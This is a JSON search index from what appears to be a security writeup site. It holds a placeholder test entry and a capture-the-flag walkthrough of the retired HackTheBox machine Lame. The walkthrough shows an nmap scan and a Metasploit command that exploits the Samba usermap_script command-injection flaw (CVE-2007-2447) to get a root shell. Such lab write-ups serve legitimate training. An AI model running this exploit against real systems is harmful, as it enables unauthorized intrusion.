[{"content":"Overview If you can read this on the site, the auto-update pipeline works.\nNotes 1 echo \u0026#34;hello from a test writeup\u0026#34; ","permalink":"https://writeups.ekaitzo.com/writeups/test-writeup/","summary":"Just checking the publish pipeline works.","title":"Test Writeup"},{"content":" ⚠️ Lame is a retired HackTheBox machine, so this writeup is safe to publish.\nOverview Lame is one of the oldest and easiest boxes on HackTheBox. Root comes directly from an unauthenticated command-injection vulnerability in Samba (CVE-2007-2447, the usermap_script bug), so there is no separate privilege-escalation step.\nRecon 1 nmap -sC -sV -p- -oA nmap/lame 10.10.10.3 Key open ports:\nPort Service 21 vsftpd 2.3.4 22 OpenSSH 139 Samba 3.0.20 445 Samba 3.0.20 Samba 3.0.20 is vulnerable to the username map script command execution flaw.\nExploitation The username field is passed to a shell unsanitised, so we can inject a command by wrapping it in backticks:\n1 2 msfconsole -q -x \u0026#34;use exploit/multi/samba/usermap_script; \\ set RHOSTS 10.10.10.3; set LHOST tun0; run\u0026#34; This drops straight into a root shell — no privesc required.\nFlags Flag Value user REDACTED root REDACTED Lessons Learned Always version-check network services; ancient Samba/vsftpd builds carry known RCEs. The Samba usermap_script bug is a textbook example of unsanitised input reaching a shell. ","permalink":"https://writeups.ekaitzo.com/writeups/htb-lame/","summary":"Classic easy Linux box rooted via the Samba usermap_script RCE (CVE-2007-2447).","title":"HTB: Lame"}]